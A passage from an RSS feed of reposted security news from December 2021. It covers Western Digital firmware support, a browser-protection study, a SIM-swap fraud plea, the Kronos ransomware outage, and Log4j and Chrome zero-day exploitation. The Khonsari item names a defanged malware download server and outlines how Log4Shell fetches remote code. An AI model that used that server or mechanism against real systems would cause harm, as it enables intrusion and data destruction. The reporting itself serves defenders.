	If the device isn't compatible with the My Cloud OS 5 firmware, they can consider <a href="https://www.westerndigital.com/mycloudupdates" rel="external nofollow" tabindex="0" target="_blank">upgrading</a> to a device that is.
</p>

<p>
	 
</p>

<p>
	"My Cloud OS 5 is a major and fundamental security release that provides an architectural revamp of our older My Cloud firmware and adds new defenses to thwart common classes of attacks," Western Digital <a href="https://www.westerndigital.com/support/product-security/wdc-21004-recommended-upgrade-to-mycloud-os-5" rel="external nofollow" target="_blank">says.</a>
</p>

<p>
	 
</p>

<p>
	"We will not provide any further security updates to the My Cloud OS3 firmware. We strongly encourage moving to the My Cloud OS5 firmware."
</p>

<h2>
	20% discount coupons for upgrades
</h2>

<p>
	For details on finding if you have a device compatible with My Cloud OS 5, you can check the <a href="https://support-en.wd.com/app/answers/detail/a_id/29230" rel="external nofollow" target="_blank">Firmware Availability and Supported Devices</a> support page.
</p>

<p>
	 
</p>

<p>
	To make it easier to upgrade to a supported My Cloud device, in January 2022 the company will email 20% discount coupons to customers whose devices aren't compatible with My Cloud OS 5.
</p>

<p>
	 
</p>

<p>
	You will not be required to return your old device to use the coupon, which will be usable for 90 days to buy one of the qualifying products: My Cloud Home (8TB), My Cloud EX2 Ultra (16TB, 24TB, 28TB) or My Book (12 TB).
</p>

<p>
	 
</p>

<p>
	To underscore the risks of running unsupported firmware, in July, Western Digital <a href="https://www.westerndigital.com/support/product-security/wdc-21008-recommended-security-measures-wd-mybooklive-wd-mybookliveduo" rel="external nofollow" target="_blank">warned of ongoing attacks</a> targeting My Book Live and My Book Live Duo devices.
</p>

<p>
	 
</p>

<p>
	In some cases, these attacks led to all data from hacked devices being erased after the attackers triggered an unauthenticated factory reset vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-35941" rel="external nofollow" target="_blank">CVE-2021-35941</a>).
</p>

<p>
	 
</p>

<p>
	The threat actors deployed <a href="https://www.virustotal.com/gui/file/9f7edb6383ca58584d3c7bd038aa3bf29f0a544fe1eedb0f8c28af52245b70f0" rel="external nofollow" target="_blank">trojan malware</a> on other compromised devices using exploits targeting a second bug, a critical root remote command execution flaw tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-18472" rel="external nofollow" target="_blank">CVE-2018-18472</a>.
</p>

<p>
	 
</p>

<p>
	The vulnerabilities exploited in these attacks were limited to the My Book Live device series that received the final firmware update in 2015.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/western-digital-warns-customers-to-update-their-my-cloud-devices/" rel="external nofollow">Western Digital warns customers to update their My Cloud devices</a>
</p>
]]></description><guid isPermaLink="false">3672</guid><pubDate>Sun, 19 Dec 2021 21:40:35 +0000</pubDate></item><item><title>Cyber Ratings report: Microsoft Edge offers better malware and phishing protection</title><link>https://nsaneforums.com/news/security-privacy-news/cyber-ratings-report-microsoft-edge-offers-better-malware-and-phishing-protection-r3663/</link><description><![CDATA[<p>
	Cyber Ratings ran a study in 2021 in which it tested the defensive capabilities of the web browsers Microsoft Edge, Mozilla Firefox and Google Chrome. The study observed the malware and phishing protections of the browsers over the course of 20 days. Four tests were run each day, with fresh attacks being added and old ones removed throughout the 20-day period.
</p>

<p>
	 
</p>

<p>
	<img alt="edge-strict-tracking-prevention.webp" class="ipsImage" data-ratio="75.10" height="379" width="720" src="https://www.ghacks.net/wp-content/uploads/2021/12/edge-strict-tracking-prevention.webp">
</p>

<p>
	 
</p>

<p>
	Google Chrome and Mozilla Firefox use Google Safe Browsing API to protect users against malware and phishing attacks. Microsoft Edge uses Microsoft Defender SmartScreen for protection.
</p>

<p>
	 
</p>

<p>
	The following browser versions were used for the test on a Windows 10 Pro version 21H1 system:
</p>

<p>
	 
</p>

<ul>
	<li>
		Google Chrome: Version 90.0.4430.212 - 91.0.4472.19
	</li>
	<li>
		Microsoft Edge: Version 91.0.864.19 - 91.0.864.37
	</li>
	<li>
		Mozilla Firefox: Version 88.0.1 - 88.0.1
	</li>
</ul>

<p>
	 
</p>

<p>
	Microsoft Edge offered better protection during the test period than the two other browsers. For malware attacks, Edge blocked 97.4% of all attacks and provided 97.7% zero-hour attack protection. Chrome blocked 86.3% of all attacks and Firefox 81.8% of all attacks, according to the study.
</p>

<p>
	 
</p>

<p>
	Microsoft Edge offered the most protection, blocking 97.4% of malware while providing the highest zero-hour protection rate (97.7%). Google Chrome provided the second-highest protection, blocking an average of 86.3%, followed by Mozilla Firefox at 81.8%.
</p>

<p>
	 
</p>

<p>
	Company researchers analyzed the blocking behavior over time. Microsoft Edge's capabilities did not change much over time, but it protected against 97.7% of all attacks from the first hour attacks began. After seven days, Edge managed to block 97.9% of all attacks.
</p>

<p>
	 
</p>

<p>
	Google Chrome and Firefox blocked 86.4% and 82.8% of all threats respectively in the first hour. On the first day, protection percentages rose to 90.6% for Chrome and 85.9% for Firefox. After seven days, Chrome blocked 93.1% of all attacks and Firefox 88.7% of all attacks according to the study.
</p>

<p>
	 
</p>

<p>
	Microsoft Edge offered better protection against phishing attacks as well, according to the study. Microsoft's browser blocked 92.3% of all phishing URLs, Chrome 84.6% and Firefox 83.2%.
</p>

<p>
	 
</p>

<p>
	Microsoft Edge offered the most protection, blocking 92.3% of phishing URLs while providing the highest zero-hour protection rate (93.5%). Google Chrome provided the second-highest protection, blocking an average of 84.6%, followed by Mozilla Firefox at 83.2%.
</p>

<p>
	 
</p>

<p>
	The block rate over time changed only slightly for all tested browsers. Edge's blocking rose to 95.1%, Chrome's to 92.9% and Firefox's to 90.6%.
</p>

<p>
	 
</p>

<p>
	Interested users can find the test methodology and the two comparative rating reports as PDF downloads on the <a data-wpel-link="external" href="https://www.cyberratings.org/view/test/8ac3f0a3fc15a380ea1717e97154f180bbcadada66c45007ad187ee98229158e/" rel="external nofollow" target="_blank">Cyber Ratings website</a>. Everything is available as a free direct download at the time of writing.
</p>

<h3>
	Closing Words
</h3>

<p>
	Microsoft Edge has the edge when it comes to malware and phishing protections according to the study. The base configuration of each browser was used and automatic updates were enabled. Protections can be improved significantly by users, for instance by installing content blockers or by using common sense while on the Internet.
</p>

<p>
	 
</p>

<p>
	(via <a data-wpel-link="external" href="https://www.drwindows.de/news/browser-sicherheit-microsoft-edge-schuetzt-besser-vor-phishing-und-malware-als-chrome-und-firefox" rel="external nofollow" target="_blank">Dr. Windows</a>)
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2021/12/17/cyber-ratings-report-microsoft-edge-offers-better-malware-and-phishing-protection/" rel="external nofollow">Cyber Ratings report: Microsoft Edge offers better malware and phishing protection</a>
</p>
]]></description><guid isPermaLink="false">3663</guid><pubDate>Fri, 17 Dec 2021 21:54:21 +0000</pubDate></item><item><title>NY Man Pleads Guilty in $20 Million SIM Swap Theft</title><link>https://nsaneforums.com/news/security-privacy-news/ny-man-pleads-guilty-in-20-million-sim-swap-theft-r3656/</link><description><![CDATA[<div>
	<p>
		A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.
	</p>

	<p>
		 
	</p>

	<p>
		Truglia <a href="https://krebsonsecurity.com/wp-content/uploads/2021/12/trugliaadmission.png" rel="external nofollow" target="_blank">admitted</a> to a New York federal court that he let a friend use his account at crypto-trading platform Binance in 2018 to launder more than $20 million worth of virtual currency stolen from Michael Terpin, a cryptocurrency investor who co-founded the first angel investor group for bitcoin enthusiasts.
	</p>

	<p>
		 
	</p>

	<p>
		Following the theft, Terpin filed a civil lawsuit against Truglia with the Los Angeles Superior court. In May 2019, the jury awarded Terpin a $75.8 million judgment against Truglia. In January 2020, a New York grand jury <a href="https://krebsonsecurity.com/wp-content/uploads/2021/12/trugliaIndictment.pdf" rel="external nofollow" target="_blank">criminally indicted Truglia</a> (PDF) for his part in the crypto theft from Terpin.
	</p>

	<p>
		 
	</p>

	<p>
		A SIM card is the tiny, removable chip in a mobile device that allows it to connect to the provider’s network. Customers can legitimately request a SIM swap when their mobile device has been damaged or lost, or when they are switching to a different phone that requires a SIM card of another size.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="truglia.png" class="ipsImage" data-ratio="76.38" height="540" width="645" src="https://krebsonsecurity.com/wp-content/uploads/2021/12/truglia.png">
	</p>

	<div id="attachment_57927">
		<p id="caption-attachment-57927">
			Nicholas Truglia, holding bottle. Image: twitter.com/erupts
		</p>
	</div>

	<p>
		 
	</p>

	<p>
		But fraudulent SIM swaps are frequently abused by scam artists who trick mobile providers into tying a target’s service to a new SIM card and mobile phone controlled by the scammers. Unauthorized SIM swaps often are perpetrated by fraudsters who have already stolen or phished a target’s password, as many financial institutions and online services rely on text messages to send users a one-time code for multi-factor authentication.
	</p>

	<p>
		 
	</p>

	<p>
		Compounding the threat, many websites let customers reset their passwords merely by clicking a link sent via SMS to the mobile phone number tied to the account, meaning anyone who controls that phone number can reset the passwords for those accounts.
	</p>

	<p>
		 
	</p>

	<p>
		Reached for comment, Terpin said his assailant got off easy.
	</p>

	<p>
		 
	</p>

	<p>
		“I am outraged that after nearly four years and hundreds of pages of evidence that the best the prosecutors could recommend was a plea bargain for a single, relatively minor count of the unauthorized use of a Binance exchange account, when all the evidence points toward Truglia being one of two masterminds of a wide-ranging criminal conspiracy to steal crypto from me and others,” Terpin told KrebsOnSecurity.
	</p>

	<p>
		 
	</p>

	<p>
		Terpin said public court records already show Truglia bragging about stealing his funds and using it to finance a lavish lifestyle.
	</p>

	<p>
		 
	</p>

	<p>
		“He at the very least withdrew 100 bitcoin (worth $1.6 million at the time and nearly $5 million today) from my theft into his wallet at a separate, US-based exchange, and then moved or spent it,” Terpin said. “The fact is that the intentional theft of $24 million, whether taken at the point of a gun in a bank or through a SIM card swap, is a major felony. Truglia should be prosecuted to the fullest extent of the law.”
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="trugliaplane.png" class="ipsImage" data-ratio="88.67" height="540" width="586" src="https://krebsonsecurity.com/wp-content/uploads/2021/12/trugliaplane.png">
	</p>

	<div id="attachment_57938">
		<p id="caption-attachment-57938">
			Nicholas Truglia, showing off a diamond-studded Piaget watch while aboard a private jet. Image: twitter.com/erupts.
		</p>
	</div>

	<p>
		 
	</p>

	<p>
		Terpin also is waging an ongoing civil lawsuit against 18-year-old Ellis Pinsky, who’s accused of working with Truglia as part of a SIM swapping crew that has stolen more than $100 million in cryptocurrency. According to Terpin, Pinsky was 15 when he took part in the $24 million 2018 SIM swap, but he returned $2 million worth of cryptocurrency after being confronted by Terpin’s investigators.
	</p>

	<p>
		 
	</p>

	<p>
		“On the surface, Pinsky is an ‘All American Boy,’” Terpin’s civil suit charges. “The son of privilege, he is active in extracurricular activities and lives a suburban life with a doting mother who is a prominent doctor.”
	</p>

	<p>
		 
	</p>

	<p>
		“Despite their wholesome appearances, Pinsky and his other cohorts are in fact evil computer geniuses with sociopathic traits who heartlessly ruin their innocent victims’ lives and gleefully boast of their multi-million-dollar heists,” the lawsuit continues. “Pinsky is reputed to have used his ill-gotten gains to purchase multi-million-dollar watches and is known to go on nightclub sprees at high end clubs in New York City, and Truglia rented private jets and played the part of a dashing playboy with young women pampering him.”
	</p>

	<p>
		 
	</p>

	<p>
		Pinsky could not be immediately reached for comment. But a review of the latest filings in the lawsuit shows that Pinsky’s attorneys stopped representing him because he no longer had the funds to pay for their services. The most recent entry in the New York Southern District’s docket asks the court to give Pinsky additional time to seek counsel, and hints that barring that he may end up representing himself.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="pinsky.png" class="ipsImage" data-ratio="60.06" height="406" width="676" src="https://krebsonsecurity.com/wp-content/uploads/2021/12/pinsky.png">
	</p>

	<div id="attachment_57929">
		<p id="caption-attachment-57929">
			Ellis Pinsky, in a photo uploaded to his social media profile.
		</p>
	</div>

	<p>
		 
	</p>

	<p>
		Truglia is still being criminally prosecuted in Santa Clara, Calif., the home of the <a href="https://krebsonsecurity.com/2018/11/busting-sim-swappers-and-sim-swap-myths/" rel="external nofollow" target="_blank">REACT task force</a>, which pursues SIM-swapping cases nationwide. In November 2018, REACT investigators and New York authorities <a href="https://nypost.com/2018/11/20/man-hacked-into-silicon-valley-execs-phones-to-steal-cryptocurrency-cops/" rel="external nofollow" target="_blank">arrested Truglia</a> on suspicion of using SIM swaps to steal approximately $1 million worth of cryptocurrencies from Robert Ross, a San Francisco father of two who later went on to found the victim advocacy website <a href="https://www.stopsimcrime.org" rel="external nofollow" target="_blank">stopsimcrime.org</a>.
	</p>

	<p>
		 
	</p>

	<p>
		According to <a href="https://nypost.com/2018/11/20/man-hacked-into-silicon-valley-execs-phones-to-steal-cryptocurrency-cops/" rel="external nofollow" target="_blank">published reports</a>, Truglia and his accomplices also perpetrated SIM swaps against the CEO of the blockchain storage service 0Chain; hedge-funder Myles Danielson, vice president of Hall Capital Partners; and Gabrielle Katsnelson, the co-founder of the startup SMBX.
	</p>

	<p>
		 
	</p>

	<p>
		Truglia is currently slated to be sentenced in April 2022 for his guilty plea in New York. He faces a maximum sentence of up to 20 years in prison.
	</p>

	<p>
		 
	</p>

	<p>
		Erin West, deputy district attorney for Santa Clara County, told KrebsOnSecurity that SIM swapping remains a major problem. But she said many of the victims they’re now assisting are relatively new cryptocurrency investors for whom a SIM swapping attack can be financially devastating.
	</p>

	<p>
		 
	</p>

	<p>
		“Originally, the SIM swap targets were the early adopters of crypto,” West said. “Now we’re seeing a lot more of what I would call normal people trying their hand at crypto, and that makes a lot more people a target. It makes people who are unfamiliar with their personal security online vulnerable to hackers whose entire job is to figure out how to part people from their money.”
	</p>

	<p>
		 
	</p>

	<p>
		West said REACT continues to train state and local law enforcement officials across the country on how to successfully investigate and prosecute SIM swapping cases.
	</p>

	<p>
		 
	</p>

	<p>
		“The good news is our partners across the nation are learning how to conduct these cases,” she said. “Where this was a relatively new phenomenon three years ago, other smaller jurisdictions around the country are now learning how to prosecute this crime.”
	</p>

	<p>
		 
	</p>

	<p>
		All of the major wireless carriers let customers add security against SIM swaps and related schemes by setting a PIN that needs to be provided over the phone or in person at a store before account changes should be made. But these security features can be bypassed by incompetent or <a href="https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/" rel="external nofollow" target="_blank">corrupt</a> <a href="https://krebsonsecurity.com/2018/08/florida-man-arrested-in-sim-swap-conspiracy/" rel="external nofollow" target="_blank">mobile store employees</a>.
	</p>

	<p>
		 
	</p>

	<p>
		For some tips on how to minimize your chances of becoming the next SIM swapping victim, check out the “What Can You Do?” section at <a href="https://krebsonsecurity.com/2018/08/hanging-up-on-mobile-in-the-name-of-security/" rel="external nofollow" target="_blank">the conclusion of this story</a>.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://krebsonsecurity.com/2021/12/ny-man-pleads-guilty-in-20-million-sim-swap-theft/" rel="external nofollow">NY Man Pleads Guilty in $20 Million SIM Swap Theft</a>
</p>
]]></description><guid isPermaLink="false">3656</guid><pubDate>Thu, 16 Dec 2021 21:47:35 +0000</pubDate></item><item><title>Ransomware Attack May Leave Many Americans Without Pay This Christmas</title><link>https://nsaneforums.com/news/security-privacy-news/ransomware-attack-may-leave-many-americans-without-pay-this-christmas-r3653/</link><description><![CDATA[<p>
	<span style="font-size:20px;">Payroll company Kronos says it could take 'several weeks' to restore system availability.</span>
</p>

<p>
	 
</p>

<p>
	We are fast approaching the end of the year, but there's a real chance many Americans won't be receiving that all-important paycheck to cover Christmas expenses thanks to ransomware.
</p>

<p>
	<br />
	As NBC News reports, payroll company Kronos was hit by a ransomware attack on Saturday, Dec. 11, which impacted its UKG solutions reliant on the Kronos Private Cloud. These are systems employers use to process time and attendance data for payroll processing and schedule management.
</p>

<p>
	<br />
	Kronos recommends that "customers evaluate alternative plans to process time and attendance data" because it doesn't know how long it will take to restore access. In an update on Dec. 14, Kronos admitted that, "Due to the nature of the incident, it may take up to several weeks to fully restore system availability." In other words, there's little chance the payroll system will be functioning this month.
</p>

<p>
	<br />
	In the latest update posted on Dec. 15, Kronos says it's exploring the available options, but that the company "strongly recommends customers consider manual time collection efforts to ensure accurate collection of employee time in the interim." Kronos also confirmed that time punch data can't currently be collected manually, which makes the situation that much more difficult for employers.
</p>

<p>
	 
</p>

<p>
	Impacted companies include GameStop, Honda, and Whole Foods, as well as several state and local government offices. Whole Foods is using paper records and doesn't think there will be a problem continuing to pay employees. Honda is currently working to minimize the disruption. The main concern right now is whether anyone who gets paid bi-weekly through UKG is going to receive any funds on their next payday (Dec. 17).
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/ransomware-attack-may-leave-many-americans-without-pay-this-christmas" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3653</guid><pubDate>Thu, 16 Dec 2021 13:42:06 +0000</pubDate></item><item><title>Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-begin-exploiting-second-log4j-vulnerability-as-a-third-flaw-emerges-r3652/</link><description><![CDATA[<p>
	Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.
</p>

<p>
	<br />
	The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.
</p>

<p>
	<br />
	"This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and Gabriel Gabor said.
</p>

<p>
	<br />
	Even more troublingly, researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Additional technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0.
</p>

<p>
	<br />
	The latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of Hafnium and Phosphorus, have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over 1.8 million attempts to exploit the Log4j vulnerability have been recorded so far.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedVideo">
	<div>
		<iframe allowfullscreen="" frameborder="0" height="113" width="200" data-embed-src="https://www.youtube.com/embed/bxDEJDqANig?feature=oembed"></iframe>
	</div>
</div>

<p>
	 
</p>

<p>
	Microsoft Threat Intelligence Center (MSTIC) said it also observed access brokers leveraging the Log4Shell flaw to gain initial access to target networks that were then sold to other ransomware affiliates. In addition, dozens of malware families that run the gamut from cryptocurrency coin miners and remote access trojans to botnets and web shells have been identified taking advantage of this shortcoming to date.
</p>

<p>
	<br />
	While it's common for threat actors to make efforts to exploit newly disclosed vulnerabilities before they're remediated, the Log4j flaw underscores the risks arising from software supply chains when a key piece of software is used within a broad range of products across several vendors and deployed by their customers around the world.
</p>

<p>
	<br />
	"This cross-cutting vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, transportation, and more," industrial cybersecurity firm Dragos noted.
</p>

<p>
	<br />
	"As network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks," the company added.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3652</guid><pubDate>Thu, 16 Dec 2021 13:31:26 +0000</pubDate></item><item><title>New ransomware now being deployed in Log4Shell attacks</title><link>https://nsaneforums.com/news/security-privacy-news/new-ransomware-now-being-deployed-in-log4shell-attacks-r3642/</link><description><![CDATA[<p>
	The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.
</p>

<p>
	 
</p>

<p>
	Last Friday, a public exploit was released for a <a href="https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/" target="_blank" rel="external nofollow">critical zero-day vulnerability named 'Log4Shell'</a> in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications.
</p>

<p>
	 
</p>

<p>
	The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.
</p>

<p>
	 
</p>

<p>
	While this vulnerability was fixed in <a href="https://logging.apache.org/log4j/2.x/download.html" rel="external nofollow" target="_blank">Log4j 2.15.0</a> and even tightened further in Log4j 2.16.0, it is being widely exploited by threat actors to <a href="https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/" target="_blank" rel="external nofollow">install various malware</a>, including coin miners, botnets, and even Cobalt Strike beacons.
</p>

<h2>
	First Log4j exploit installing ransomware
</h2>

<p>
	Yesterday, <a href="https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild" rel="external nofollow" target="_blank">BitDefender reported</a> that they found the first ransomware family being installed directly via Log4Shell exploits.
</p>

<p>
	 
</p>

<p>
	The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class that is loaded and executed by the Log4j application.
</p>

<p>
	 
</p>

<p>
	Once loaded, it would download a .NET binary from the same server to install new ransomware [<a href="https://www.virustotal.com/gui/file/f2e3f685256e5f31b05fc9f9ca470f527d7fdae28fa3190c8eba179473e20789" rel="external nofollow" target="_blank">VirusTotal</a>] named 'Khonsari.'
</p>

<p>
	 
</p>

<p>
	This same name is also used as the extension for encrypted files and in the ransom note, as shown below.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="ransom-note.jpg" class="ipsImage" data-ratio="66.25" height="348" width="720" src="https://www.bleepstatic.com/images/news/ransomware/k/Khonsari/ransom-note.jpg">
		</p>

		<figcaption>
			Khonsari ransom note<br>
			Source: BleepingComputer
		</figcaption>
	</figure>
</div>

<p>
	In later attacks, BitDefender noticed that this threat actor used the same server to distribute the Orcus Remote Access Trojan.
</p>

<h2>
	Likely a wiper
</h2>

<p>
	Ransomware expert Michael Gillespie told BleepingComputer that Khonsari uses valid encryption and is secure, meaning that it is not possible to recover files for free.
</p>

<p>
	 
</p>

<p>
	However, the ransom note has one oddity - it does not appear to include a way to contact the threat actor to pay a ransom.
</p>

<p>
	 
</p>

<p>
	Emsisoft analyst <a href="https://twitter.com/BrettCallow" rel="external nofollow" target="_blank">Brett Callow</a> pointed out to BleepingComputer that the ransomware is named after and uses contact information for a Louisiana antique shop owner rather than the threat actor.
</p>

<p>
	 
</p>

<p>
	Therefore, it is unclear if that person is the actual victim of the ransomware attack or listed as a decoy.
</p>

<p>
	 
</p>

<p>
	Regardless of the reason, as it does not contain legitimate contact information for the threat actors, we believe this is a wiper rather than ransomware.
</p>

<p>
	 
</p>

<p>
	While this may be the first known instance of the Log4j exploit directly installing ransomware (wiper?), Microsoft has already seen the exploits used to deploy Cobalt Strike beacons.
</p>

<p>
	 
</p>

<p>
	Therefore, it is likely that more advanced ransomware operations are already using the exploits as part of their attacks.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/" rel="external nofollow">New ransomware now being deployed in Log4Shell attacks</a>
</p>
]]></description><guid isPermaLink="false">3642</guid><pubDate>Wed, 15 Dec 2021 03:38:13 +0000</pubDate></item><item><title>Google pushes emergency Chrome update to fix zero-day used in attacks</title><link>https://nsaneforums.com/news/security-privacy-news/google-pushes-emergency-chrome-update-to-fix-zero-day-used-in-attacks-r3635/</link><description><![CDATA[<p>
	Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.
</p>

<p>
	 
</p>

<p>
	"Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild," the browser vendor said in today's <a href="https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html" rel="external nofollow" target="_blank">security advisory</a>.
</p>

<p>
	 
</p>

<p>
	Although the company says this update may take some time to reach all users, it has already begun rolling out Chrome 96.0.4664.110 worldwide in the Stable Desktop channel.
</p>

<p>
	 
</p>

<p>
	The update was available immediately when BleepingComputer checked for new updates from Chrome menu &gt; Help &gt; About Google Chrome. The browser will also auto-check for recent updates and update itself automatically after the next launch.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="Google_Chrome_96_update.jpg" class="ipsImage" data-ratio="32.64" height="229" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2021/Google_Chrome_96_update.jpg">
		</p>

		<figcaption>
			Google Chrome 96 update
		</figcaption>
	</figure>
</div>

<h2>
	Zero-day exploitation details not revealed
</h2>

<p>
	The zero-day bug fixed today, tracked as CVE-2021-4102, was reported by an anonymous security researcher and is a <a href="https://cwe.mitre.org/data/definitions/416.html" rel="external nofollow" target="_blank">use after free</a> weakness in the Chrome V8 JavaScript engine.
</p>

<p>
	 
</p>

<p>
	Attackers commonly exploit use after free bugs to execute arbitrary code on computers running unpatched Chrome versions or escape the browser's security sandbox.
</p>

<p>
	 
</p>

<p>
	While Google said it detected in-the-wild attacks abusing this zero-day, it did not share additional information about these incidents.
</p>

<p>
	 
</p>

<p>
	"Access to bug details and links may be kept restricted until a majority of users are updated with a fix," Google added.
</p>

<p>
	 
</p>

<p>
	"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed."
</p>

<p>
	 
</p>

<p>
	Until the browser vendor releases additional details regarding this bug's in-the-wild exploitation, users should have enough time to upgrade Chrome and prevent exploitation attempts.
</p>

<h2>
	Sixteenth Chrome zero-day fixed this year
</h2>

<p>
	With this update, Google has addressed 16 Chrome zero-day vulnerabilities since the start of the year.
</p>

<p>
	 
</p>

<p>
	The other 15 zero-days patched in 2021 are listed below:
</p>

<p>
	 
</p>

<ul>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-day-actively-exploited-in-the-wild/" target="_blank" rel="external nofollow">CVE-2021-21148</a> - February 4th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-fixes-second-actively-exploited-chrome-zero-day-bug-this-year/" target="_blank" rel="external nofollow">CVE-2021-21166</a> - March 2nd
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-fixes-second-actively-exploited-chrome-zero-day-this-month/" target="_blank" rel="external nofollow">CVE-2021-21193</a> - March 12th
	</li>
	<li>
		<a href="https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html" rel="external nofollow" target="_blank">CVE-2021-21220</a> - April 13th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-fixes-exploited-chrome-zero-day-dropped-on-twitter-last-week/" target="_blank" rel="external nofollow">CVE-2021-21224</a> - April 20th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-fixes-sixth-chrome-zero-day-exploited-in-the-wild-this-year/" target="_blank" rel="external nofollow">CVE-2021-30551</a> - June 9th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-fixes-seventh-chrome-zero-day-exploited-in-the-wild-this-year/" target="_blank" rel="external nofollow">CVE-2021-30554</a> - June 17th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-patches-8th-chrome-zero-day-exploited-in-the-wild-this-year/" target="_blank" rel="external nofollow">CVE-2021-30563</a> - July 15th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/google/google-patches-10th-chrome-zero-day-exploited-in-the-wild-this-year/" target="_blank" rel="external nofollow">CVE-2021-30632 and CVE-2021-30633</a> - September 13th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/emergency-google-chrome-update-fixes-zero-day-exploited-in-the-wild/" target="_blank" rel="external nofollow">CVE-2021-37973</a> - September 24th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/google-pushes-emergency-chrome-update-to-fix-two-zero-days/" target="_blank" rel="external nofollow">CVE-2021-37976 and CVE-2021-37975</a> - September 30th
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/google/emergency-google-chrome-update-fixes-zero-days-used-in-attacks/" target="_blank" rel="external nofollow">CVE-2021-38000 and CVE-2021-38003</a> - October 28th
	</li>
</ul>

<p>
	 
</p>

<p>
	Because this zero-day is known to have been used by attackers in the wild, installing today's Google Chrome update is strongly recommended as soon as it's available.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/google-pushes-emergency-chrome-update-to-fix-zero-day-used-in-attacks/" rel="external nofollow">Google pushes emergency Chrome update to fix zero-day used in attacks</a>
</p>
]]></description><guid isPermaLink="false">3635</guid><pubDate>Tue, 14 Dec 2021 08:33:42 +0000</pubDate></item><item><title>The Log4J Vulnerability Will Haunt the Internet for Years</title><link>https://nsaneforums.com/news/security-privacy-news/the-log4j-vulnerability-will-haunt-the-internet-for-years-r3634/</link><description><![CDATA[<div>
	<p>
		<strong>Hundreds of millions of devices are likely affected.</strong>
	</p>
</div>


<div>
	<div>
		<div>
			<div>
				<div>
					<div>
						<p>
